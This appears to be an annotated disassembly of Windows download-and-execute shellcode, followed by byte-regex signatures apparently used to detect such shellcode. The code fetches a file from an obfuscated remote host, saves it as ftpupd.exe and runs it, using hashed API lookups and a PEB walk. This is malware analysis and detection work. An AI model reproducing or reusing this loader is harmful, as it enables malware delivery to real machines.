0000014F ; Every kernel32/ws2_32 call goes through CallProcKernel32 / CallProcWS2_32 (below): arguments
0000014F ;   are pushed normally, the call is followed by a dd hash of the export name, and execution
0000014F ;   resumes after that dd.
0000014F
0000014F loc_14F:
0000014F call loc_15E ; pushes 154h: that address becomes the SEH handler installed at 163h
00000154 mov esp, [esp+8] ; handler body, reached only on an exception: [esp+8] is the EstablisherFrame = the record pushed at 160h
00000158 pop dword ptr fs:[eax] ; restore the previous handler -- only correct if eax == 0 at handler entry (NOTE(review): not established by this listing, confirm)
0000015B pop eax ; discards the handler address
0000015C jmp short loc_14F ; re-install the frame and re-run the whole payload from the top
0000015E ; ---------------------------------------------------------------------------
0000015E
0000015E loc_15E:
0000015E xor ebx, ebx
00000160 push dword ptr fs:[ebx] ; fs:[0] = current SEH chain head -> becomes record.Next
00000163 mov fs:[ebx], esp ; install the record {Next, Handler = 154h}; it is never unlinked
00000166 lea eax, [ebp+168h] ; Mutex Name -- ebp+168h = 2B2h = "u9" (aU9 below)
0000016C push eax
0000016D push 1 ; bInheritHandle
0000016F push 1F0001h ; MUTEX_ALL_ACCESS
00000174 call CallProcKernel32 ; OpenMutexA(MUTEX_ALL_ACCESS, TRUE, "u9")
00000174 ; ---------------------------------------------------------------------------
00000179 dd 0AE52C609h ; OpenMutexA -- hash consumed by CallProcKernel32's lodsd; execution resumes at 17Dh
0000017D ; ---------------------------------------------------------------------------
0000017D or eax, eax
0000017F jnz loc_2A7 ; mutex exists -> an instance is already running: exit without downloading again
00000185 sub esp, 200h ; 512-byte scratch for the WSADATA out-parameter
0000018B push esp ; lpWSAData
0000018C push 101h ; wVersionRequested = 1.1
00000191 call CallProcWS2_32 ; WSAStartup(0x101, &wsadata)
00000191 ; ---------------------------------------------------------------------------
00000196 dd 0CDDE757Dh ; WSAStartup
0000019A ; ---------------------------------------------------------------------------
0000019A add esp, 200h ; return value is not checked
000001A0 push 6 ; IPPROTO_TCP
000001A2 push 1 ; SOCK_STREAM
000001A4 push 2 ; AF_INET
000001A6 call CallProcWS2_32 ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
000001A6 ; ---------------------------------------------------------------------------
000001AB dd 0FC7AF16Ah ; socket
000001AF ; ---------------------------------------------------------------------------
000001AF mov [ebp+184h], eax ; socket -> scratch slot at 2CEh (in the zero padding below); not checked for INVALID_SOCKET
000001B5 sub esp, 40h ; room for a sockaddr_in (only 10h bytes are used)
000001B8 mov word ptr [esp], 2 ; sin_family = AF_INET
000001BE mov ax, [ebp-2Ch] ; ebp-2Ch = 11Eh: the dw above, already in network byte order
000001C2 mov [esp+2], ax ; sin_port
000001C7 mov eax, [ebp-2Ah] ; ebp-2Ah = 120h: the XOR-obfuscated dd above
000001CA xor eax, 0AAAAAAAAh ; de-obfuscate the address (the real IP bytes never appear in the clear)
000001CF mov [esp+4], eax ; sin_addr
000001D3 sub eax, eax
000001D5 lea edi, [esp+8]
000001D9 stosd ; sin_zero[0..7] = 0
000001DA stosd
000001DB mov ebx, esp ; &sockaddr_in
000001DD push 10h ; sizeof(sockaddr_in)
000001DF push ebx
000001E0 push dword ptr [ebp+184h]
000001E6 call CallProcWS2_32 ; connect(s, &sa, 16)
000001E6 ; ---------------------------------------------------------------------------
000001EB dd 0EDD8FE8Ah ; connect
000001EF ; ---------------------------------------------------------------------------
000001EF add esp, 40h
000001F2 or eax, eax
000001F4 jnz loc_2A7 ; connect failed -> give up; the socket is never closed
000001FA push 4 ; PAGE_READWRITE
000001FC push 1000h ; MEM_COMMIT
00000201 push 10000h ; 64 KiB
00000206 push 0 ; lpAddress = NULL
00000208 call CallProcKernel32 ; VirtualAlloc(NULL, 0x10000, MEM_COMMIT, PAGE_READWRITE)
00000208 ; ---------------------------------------------------------------------------
0000020D dd 697A6AFEh ; VirtualAlloc
00000211 ; ---------------------------------------------------------------------------
00000211 mov [ebp+17Ch], eax ; buffer -> scratch slot at 2C6h; a NULL return is not checked
00000217 push 0 ; flags
00000219 push 10000h ; len
0000021E push eax ; buf
0000021F push dword ptr [ebp+184h] ; s
00000225 call CallProcWS2_32 ; recv(s, buf, 0x10000, 0) -- a single recv: only what arrives in that one call is kept
00000225 ; ---------------------------------------------------------------------------
0000022A dd 0E5971F6h ; recv
0000022E ; ---------------------------------------------------------------------------
0000022E push eax ; save recv's byte count; it survives the next two stdcall calls and is popped at 263h
0000022F push 2 ; SD_BOTH
00000231 push dword ptr [ebp+184h]
00000237 call CallProcWS2_32 ; shutdown(s, SD_BOTH)
00000237 ; ---------------------------------------------------------------------------
0000023C dd 4C7C5841h ; shutdown
00000240 ; ---------------------------------------------------------------------------
00000240 sub eax, eax
00000242 push eax ; hTemplateFile = NULL
00000243 push eax ; dwFlagsAndAttributes = 0
00000244 push 2 ; CREATE_ALWAYS
00000246 push eax ; lpSecurityAttributes = NULL
00000247 push eax ; dwShareMode = 0
00000248 push 40000000h ; GENERIC_WRITE
0000024D lea ebx, [ebp+16Fh] ; ebp+16Fh = 2B9h = ".\ftpupd.exe" (a_Ftpupd_exe below)
00000253 push ebx
00000254 call CallProcKernel32 ; CreateFileA(".\ftpupd.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL)
00000254 ; ---------------------------------------------------------------------------
00000259 dd 8F8F114h ; CreateFileA
0000025D ; ---------------------------------------------------------------------------
0000025D mov [ebp+16Bh], eax ; file handle -> scratch slot at 2B5h (padding after "u9")
00000263 pop edx ; edx = recv byte count pushed at 22Eh (a -1 error return from recv is not filtered out)
00000264 cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
00000267 jz short loc_2A7
00000269 push esp ; scratch dword used as lpNumberOfBytesWritten
0000026A mov eax, esp
0000026C push 0 ; lpOverlapped
0000026E push eax ; lpNumberOfBytesWritten
0000026F push edx ; nNumberOfBytesToWrite
00000270 push dword ptr [ebp+17Ch] ; lpBuffer
00000276 push dword ptr [ebp+16Bh] ; hFile
0000027C call CallProcKernel32 ; WriteFile(h, buf, n, &written, NULL)
0000027C ; ---------------------------------------------------------------------------
00000281 dd 0F3FD1C3h ; WriteFile
00000285 ; ---------------------------------------------------------------------------
00000285 pop ecx ; discard the scratch dword
00000286 push dword ptr [ebp+16Bh]
0000028C call CallProcKernel32 ; CloseHandle(h)
0000028C ; ---------------------------------------------------------------------------
00000291 dd 723EB0D5h ; CloseHandle
00000295 ; ---------------------------------------------------------------------------
00000295 push 5 ; SW_SHOW
00000297 lea ebx, [ebp+16Fh]
0000029D push ebx
0000029E call CallProcKernel32 ; WinExec(".\ftpupd.exe", SW_SHOW): runs whatever was received
0000029E ; ---------------------------------------------------------------------------
000002A3 dd 0E8BF6DADh ; WinExec
000002A7 ; ---------------------------------------------------------------------------
000002A7
000002A7 loc_2A7:
000002A7 push 0
000002A9 call CallProcKernel32 ; ExitThread(0) -- every error path ends here
000002A9 ; ---------------------------------------------------------------------------
000002AE dd 768AA260h ; ExitThread
000002B2 aU9 db 'u9',0 ; mutex name, [ebp+168h]
000002B5 db 0 ; 2B5h..2B8h: scratch slot [ebp+16Bh] (CreateFileA handle)
000002B6 db 0
000002B7 db 0
000002B8 db 0
000002B9 a_Ftpupd_exe db '.\ftpupd.exe',0 ; dropped file, relative to the exploited process's current directory; [ebp+16Fh]
000002C6 db 0 ; 2C6h..2C9h: scratch slot [ebp+17Ch] (VirtualAlloc buffer)
000002C7 db 0
000002C8 db 0
000002C9 db 0
000002CA db 0 ; 2CAh..2CDh: scratch slot [ebp+180h] (last resolved API address, written by CallProcKernel32)
000002CB db 0
000002CC db 0
000002CD db 0
000002CE db 0 ; 2CEh..2D1h: scratch slot [ebp+184h] (socket)
000002CF db 0
000002D0 db 0
000002D1 db 0
000002D2 aSleep db 'Sleep',0 ; not referenced by any instruction in this listing
000002D8 aKernel32 db 'kernel32',0 ; not referenced by any instruction in this listing
000002E1 ; =============== S U B R O U T I N E =======================================
000002E1
000002E1
000002E1 CallProcWS2_32 proc near
000002E1 ; Same convention as CallProcKernel32, but the export is looked up in WS2_32.DLL:
000002E1 ;   push args; call CallProcWS2_32; dd <hash of export name>; <resume here>
000002E1 ; Loads ws2_32 via LoadLibraryA on every call, then falls into the export walk at loc_311.
000002E1 pop esi ; esi -> the dd hash placed right after the call site
000002E2 lodsd ; eax = hash; esi -> the instruction after the dd (the "jmp esi" in CallProcKernel32 resumes there)
000002E3 pusha ; eax (the hash) lands at [esp+1Ch], where loc_311 reads it
000002E4 xor eax, eax
000002E6 sub eax, 87FFB3B4h ; eax = 78004C4Ch = "LL",0,'x'
000002EB push eax
000002EC xor eax, 3C2E7E7Fh ; eax = 442E3233h = "32.D"
000002F1 push eax
000002F2 add eax, 1B042124h ; eax = 5F325357h = "WS2_"
000002F7 push eax ; the three pushes spell "WS2_32.DLL",0 on the stack (built arithmetically, so the name is not a plain string in the bytes)
000002F8 push esp ; lpLibFileName
000002F9 call CallProcKernel32 ; LoadLibraryA("WS2_32.DLL")
000002F9 ; ---------------------------------------------------------------------------
000002FE dword_2FE dd 0C8AC8026h ; LoadLibraryA -- checked: this is the rol-7/xor hash (loop at loc_328) of "LoadLibraryA"
00000302 ; ---------------------------------------------------------------------------
00000302 lea esp, [esp+0Ch] ; drop the three string dwords; esp is back on the pusha frame
00000306 xchg eax, ebx ; ebx = module base returned by LoadLibraryA
00000307 jmp short loc_311 ; continue with CallProcKernel32's export walk, ebx = ws2_32 base
00000307 CallProcWS2_32 endp
00000307
00000309
00000309 ; =============== S U B R O U T I N E =======================================
00000309
00000309
00000309 CallProcKernel32 proc near
00000309 ; Calls a kernel32 export identified by a 32-bit hash of its name.
00000309 ; Usage: push args; call CallProcKernel32; dd <hash>; <resume here>
00000309 ; Returns with eax = the API's return value, execution resumed after the dd.
00000309 ; Side effect: [ebp+180h] (scratch slot at 2CAh) receives the resolved address.
00000309 pop esi ; esi -> the dd hash after the call site
0000030A lodsd ; eax = hash; esi -> resume address
0000030B pusha ; the saved eax (the hash) sits at [esp+1Ch]; the same slot later carries the resolved address out through popa
0000030C call GetKernel32Base ; ebx = kernel32 image base
00000311
00000311 loc_311: ; also entered from CallProcWS2_32 with ebx = ws2_32 base and an identical pusha frame
00000311 mov ecx, [ebx+3Ch] ; e_lfanew
00000314 mov ecx, [ecx+ebx+78h] ; export DataDirectory RVA
00000318 add ecx, ebx ; ecx -> IMAGE_EXPORT_DIRECTORY
0000031A xor esi, esi ; esi = name index
0000031C
0000031C loc_31C:
0000031C lea edx, [ebx+esi*4]
0000031F add edx, [ecx+20h] ; AddressOfNames
00000322 mov edx, [edx]
00000324 add edx, ebx ; edx -> export name string
00000326 xor eax, eax
00000328
00000328 loc_328: ; hash = for each byte c of the name: hash = rol(hash, 7) ^ c  (e.g. "recv" -> 0E5971F6h)
00000328 rol eax, 7
0000032B xor al, [edx]
0000032D inc edx
0000032E cmp byte ptr [edx], 0
00000331 jnz short loc_328
00000333 cmp eax, [esp+1Ch] ; compare with the requested hash
00000337 jz short loc_340
00000339 inc esi
0000033A cmp esi, [ecx+18h] ; NumberOfNames
0000033D jb short loc_31C
0000033F int 3 ; Trap to Debugger -- no export matched; presumably lands in the SEH handler installed at loc_15E, which restarts the payload
00000340
00000340 loc_340:
00000340 mov edx, [ecx+24h] ; AddressOfNameOrdinals
00000343 add edx, ebx
00000345 movzx edx, word ptr [edx+esi*2] ; ordinal for name index esi
00000349 mov eax, [ecx+1Ch] ; AddressOfFunctions
0000034C add eax, ebx
0000034E mov eax, [eax+edx*4]
00000351 add eax, ebx ; eax = export VA (a forwarder RVA would be returned as-is; nothing checks for it)
00000353 mov [esp+1Ch], eax ; overwrite the saved eax so popa yields the address
00000357 popa
00000358 mov [ebp+180h], eax ; remember the resolved address
0000035E call eax ; call the API with the arguments the caller already pushed; the callee (stdcall) removes them
00000360 jmp esi ; resume just past the dd hash
00000360 CallProcKernel32 endp
00000360
00000362
00000362 ; =============== S U B R O U T I N E =======================================
00000362
00000362
00000362 GetKernel32Base proc near
00000362 ; Returns ebx = kernel32.dll image base by walking the loader lists in the PEB.
00000362 ; Clobbers: ebx only.
00000362 mov ebx, fs:30h ; PEB
00000368 mov ebx, [ebx+0Ch] ; PEB.Ldr
0000036B mov ebx, [ebx+1Ch] ; Ldr.InInitializationOrderModuleList.Flink (first entry)
0000036E mov ebx, [ebx] ; second entry
00000370 mov ebx, [ebx+8] ; DllBase of that entry -- assumes the second module in initialization order is kernel32 (NOTE(review): true of the XP-era targets this sample was captured against; later Windows versions load other modules first, confirm before reusing this walk in detection logic)
00000373 retn
00000373 GetKernel32Base endp
00000373
shellcode patterns
wuerzburg
"\\xEB\\x27(..)(....)\\x5D\\x33\\xC9\\x66\\xB9..\\x8D"
"\\x75\\x05\\x8B\\xFE\\x8A\\x06\\x3C.\\x75\\x05"
"\\x46\\x8A\\x06\\x2C.\\x46\\x34.\\x88\\x07"
"\\x47\\xE2\\xED\\xEB\\x0A\\xE8\\xDA\\xFF\\xFF\\xFF";